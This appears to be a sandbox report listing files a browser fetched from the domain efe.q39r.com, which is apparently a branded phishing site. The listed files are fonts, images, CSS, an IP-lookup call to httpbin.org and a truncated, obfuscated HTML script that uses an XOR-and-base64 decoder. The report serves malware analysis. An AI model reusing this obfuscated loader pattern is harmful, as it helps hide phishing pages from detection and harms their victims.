                                                                                  SSDEEP:768:8n53CNftp4NM/2qxGvtAG9fvpWYSTvlj6OIqrd1xUseRc:85SNfQS2ntfxvpWYSTcfMERc
                                                                                  MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                                  SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                                  SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                                  SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/56wgt99Sy67foh23sxX40uDyhst60
                                                                                  Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:dropped
                                                                                  Size (bytes):2905
                                                                                  Entropy (8bit):3.962263100945339
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                                                  MD5:FE87496CC7A44412F7893A72099C120A
                                                                                  SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                                  SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                                  SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:dropped
                                                                                  Size (bytes):270
                                                                                  Entropy (8bit):4.840496990713235
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                                                  MD5:40EB39126300B56BF66C20EE75B54093
                                                                                  SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                                  SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                                  SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 4096 x 4096, 8-bit/color RGBA, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):259183
                                                                                  Entropy (8bit):7.172405308346001
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:NNxC3OF49VjxmuJgwQGPPQLKbko7qXYcHXxGSwpi6UaXhWIEao+x6VNyC0Xj71fz:JCeF4VjxmuJgwQGPPQLKbko7qXn3kS6D
                                                                                  MD5:DFD243DB9FCFDB629957D9E17C7C314F
                                                                                  SHA1:19A56EC6D5F5360BF8A044BEEC85F9C69B2A3417
                                                                                  SHA-256:E205239979E7FBCEBE800D1F9CE1139A2EEC9EF49781DD0C90B7811E3E963D12
                                                                                  SHA-512:E4EFE442BE74B5118801EB3B2E1D803858031A333ABF8BF5776D856DE95C0437B59E259032F91BA950329C49ED5EE4BEE4CF7FDAF02D7923A2985FD8D0652865
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/wxW67qXyrj6Vx0Tfu5cRa39uRp3UsvPq5ft22uk0KSw6D3TMfkrP5uXt2IKdP788HXJHkiwXCVeDyNaZS41ShN0mtBkm7fjNwOySWbWl1KwtDzywab430
                                                                                  Preview:.PNG........IHDR..............$.....pHYs............... .IDATx...{.].].p..R..M.xwfm+...T.I.....!hd!.........Q..A..Nh.*.P(....VPY...@"RM.y.;s..")i.}D..V%.qj_.][U..Il.z........{....=.a.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (1437), with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):38221
                                                                                  Entropy (8bit):5.115226983536052
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:loogIexLQ5WKTCFBwCIZtJ8FtX2+UBRkfeWcrScuH9Ye3YdersR8Q5oqWjf7ogxp:2DKAaZtJs5odw7hx5P6mqjDggJkLLn
                                                                                  MD5:FBE2FCF4596B299453C91B7231BA7427
                                                                                  SHA1:743291EE60A551E043529AFDC9E3FBE72D70E776
                                                                                  SHA-256:2DE22B4CDEDCBEB9CD5F63EA7A0DF8F77D0EF9086D200B052BFA9EE949DEED40
                                                                                  SHA-512:15CA09CD5754927D77B2CC9B74356585C5A1DD934ECF25B613F47964236A739DA8BE389999DE1AEEE7BDF8FA12FCBB07EEFF49E0EA80BA87AC786606DE74774F
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/abx86uorshef28
                                                                                  Preview:@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web8/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/web8/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;src: url('/web8/ass
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):61
                                                                                  Entropy (8bit):3.990210155325004
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):231
                                                                                  Entropy (8bit):6.725074433303473
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                                                  MD5:547988BAC5584B4608466D761E16F370
                                                                                  SHA1:C11BB71049702528402A31027F200184910A7E23
                                                                                  SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                                                  SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):76
                                                                                  Entropy (8bit):4.631455882779888
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:xPW1skF0NuiQMnumOPIOAyP2MR:xPWmJumOPzAo2C
                                                                                  MD5:55D6D0CAE462E2BC690BC8AF45985B15
                                                                                  SHA1:0AD644096680FB01BFD9AF1CFE5F6E68911EA01F
                                                                                  SHA-256:2E5AE61757DB10E0E3770407B68ADE329068C840070A02F119C9EBE296194043
                                                                                  SHA-512:A929EE066B9150F1DC864A38FC1BF7D1F69B560CF6C123C0709EC983581B0B5F37360B3F318CA78EC9A3755C592A2928FA882CB34F160381ADA5A148B0786BCA
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSMwlCs-GO0pB33BIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ3QAkDsEgUNqF3jdA==?alt=proto
                                                                                  Preview:CjYKBw3PIyr/GgAKBw3Fk8QkGgAKBw2JpWfLGgAKBw3DGTmQGgAKBw3QAkDsGgAKBw2oXeN0GgA=
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 56 x 99, 8-bit/color RGB, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):61
                                                                                  Entropy (8bit):4.002585360278503
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:yionv//thPl/ksT/xl/k4E08up:6v/lhP6sb7Tp
                                                                                  MD5:F18D8D59B1A1FF352F18F7F46F23C995
                                                                                  SHA1:02315EEF8B5E50FED63E04083C539D753672AB36
                                                                                  SHA-256:3BF519D452AE9D482F5E214951034110A204FEC57DC16482E9980F4D47A44C1F
                                                                                  SHA-512:7D667A378F606CE34FE49C5910991655596960658D7AD81BF0F55EC8E1447FF8A2EF36C27800E082B30E7A99A49230C794979DE0649642DB21777FD87CD4CF60
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.PNG........IHDR...8...c.....A.T}....IDAT.....$.....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                                  Category:downloaded
                                                                                  Size (bytes):93276
                                                                                  Entropy (8bit):7.997636438159837
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:Dy7KSLv+MMqDeeIgDFSxpuQP7ObnKSWBO61LlRzSSAT6YmkSzOu7Be0OB53jIH4I:Dy7JD+net+puI7ObKHVhTSSlYmk4OuWa
                                                                                  MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                                  SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                                  SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                                  SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/efIbTPq3F3E9M4tIsfj78N3gmAo2XLQkl100
                                                                                  Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):29796
                                                                                  Entropy (8bit):7.980058333789969
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                                                  MD5:210433A8774859368F3A7B86D125A2A7
                                                                                  SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                                                  SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                                                  SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, ASCII text, with very long lines (1445), with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):1812
                                                                                  Entropy (8bit):5.987681382133351
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:7IqeGXvh4Kz1IaamTlDF1tLMFuiErsiVUOZjFstH:5rRamTVfdMHViCOZj+
                                                                                  MD5:2B8391A5725C3D46F5FE2BD716DD3346
                                                                                  SHA1:ABC4FCE7351FED1CE57DDFF5E5EB96C4452B7FA0
                                                                                  SHA-256:86E95477DDF069D92A900BDE1A33EBB0F7E9E6810E2EBB13E7DDE7D4D3FD9895
                                                                                  SHA-512:8305C6A0DD7A6BA31EA40089835A9B7BE35549FFB43FF2A03BF4C66112191434873A4FFA9469ABC0D16ADA6968B528E31FB06148C4A1BC2147B36DED5876BC0A
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/efe/
                                                                                  Preview:<script>..function wEGYueEyJV(zfZMyaMofD, PSrLtiLimu) {..let krZgLTLctn = '';..zfZMyaMofD = atob(zfZMyaMofD);..let salsnkaSMl = PSrLtiLimu.length;..for (let i = 0; i < zfZMyaMofD.length; i++) {.. krZgLTLctn += String.fromCharCode(zfZMyaMofD.charCodeAt(i) ^ PSrLtiLimu.charCodeAt(i % salsnkaSMl));..}..return krZgLTLctn;..}..var ELUbCGaakq = wEGYueEyJV(`eEs0Bh9GBFpuOTJZJVQyUwolB2Uidx4nVgtQEwpdIFcgWhpZEwUXWitWeRwXRRhKEEYmSyMGXgdZX245Ik05FwJfHwpDdzNSBxE7WRYNOhslbhk2EEMZNBNJbRgseXwWUERDRzZBdw97PFBEQxNkGHdUBFMEERFdZFojGxceERAMUWxZATo0UAUNM0M+EX5USwtQBTV9Bl4iHSZGCl9uOWQYd1QLFhMFF1AsGH8RBERZRBg+Thh3VFYWUERDQSFMIgYYFhYFD0AhA1p+VhZQRB4+TkVafh9QWCAGSQVcARI5fyNEXg5kGnVdDTt6REMTZE8+GhJZB0oPXCdZIx0ZWF4MEVYiGGpUAV8eAAxEalQ4FxdCGQsNHTRZIxwYVx0BQxhkGmhWVh1QRhsRfzVdCXs8GQJLdyFCFhAgUD8tMBNlBWpUVBRZH245ZBh3VB9QUEwnRC5oMjkZUBk9S3chQhYQIFA/LTAabRgseXwWUERDRSVKdy4mTwMxF10WVQBUSxYREAxRbHwyDjdSJgIsehcRbHl8FlBEQ0UlSnceDl4+LQRcLVMUVEsWWD4zSjdtIxokWydKDlIwWz9cWR4rOBQdaWV8NC1XXR4iHh4Iek1YGy1PPx0fWXoONxsqVE4KGUNl
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):29796
                                                                                  Entropy (8bit):7.980058333789969
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                                                  MD5:210433A8774859368F3A7B86D125A2A7
                                                                                  SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                                                  SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                                                  SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/opDozZ86DfeH93KodasaV6JoKAz0XdnqsnPjlpZlIO7stX2Hqwxgyu5mt9zG3Ft9LdS3Ohi89ehtoHb0ef232
                                                                                  Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                                  Category:downloaded
                                                                                  Size (bytes):35970
                                                                                  Entropy (8bit):7.989503040923577
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:GJiLCleIZlcBvahjeheOQKskmCp9sE9gBkGgvU+7aAXDqWOtU:GJo9IgMKsQzJ9gBkZbuAXDqWV
                                                                                  MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                                  SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                                  SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                                  SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/12YCk90LK56Se1ynKqr42
                                                                                  Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):727
                                                                                  Entropy (8bit):7.573165690842521
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                                                  MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                                                  SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                                                  SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                                                  SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:JSON data
                                                                                  Category:downloaded
                                                                                  Size (bytes):33
                                                                                  Entropy (8bit):4.06667707370723
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:pW04Uuvv:pW0Zuvv
                                                                                  MD5:6E311A109C6AC4B9C5D73A4D4CD12813
                                                                                  SHA1:CEC3F1BC64A7C2A484835D4796DF661BA48F7F5D
                                                                                  SHA-256:F0F3741D3611B7481793B25B7269FEFC970008A32EBEDA9F61804EECEC32A97B
                                                                                  SHA-512:9F51F5FA88741102F1115DC0165FFB1C4DC3B1B85645BBE7A05D22ABC7657F7110AFF07566FF85BDC9F5E49D4B3C4A68953855F3F2B9C84893D288CF9CC1022C
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://httpbin.org/ip
                                                                                  Preview:{. "origin": "185.152.66.230".}.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (23398), with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):23398
                                                                                  Entropy (8bit):5.104409455331282
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:ztafGtz2omXX44PL5Ky0sdY8xbXnb4YEb0tkBSgfn:hafSz2omXX44PL5Ky0sdY8xbXnEYw0sz
                                                                                  MD5:C1C51D30D5E7094136F2D828349E520F
                                                                                  SHA1:10AE8971AD7A8798BC9732707FE4896B57541557
                                                                                  SHA-256:0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
                                                                                  SHA-512:7CF90E58A309B53DB53570129780E0ABCEFA2802C1A6441C1A4B49DC265DF617220DC1072CEBDAE7A74C3CA85F5D87B606503BD48A60E049372BE5CAF39969F7
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/34fI8EabNdid6714
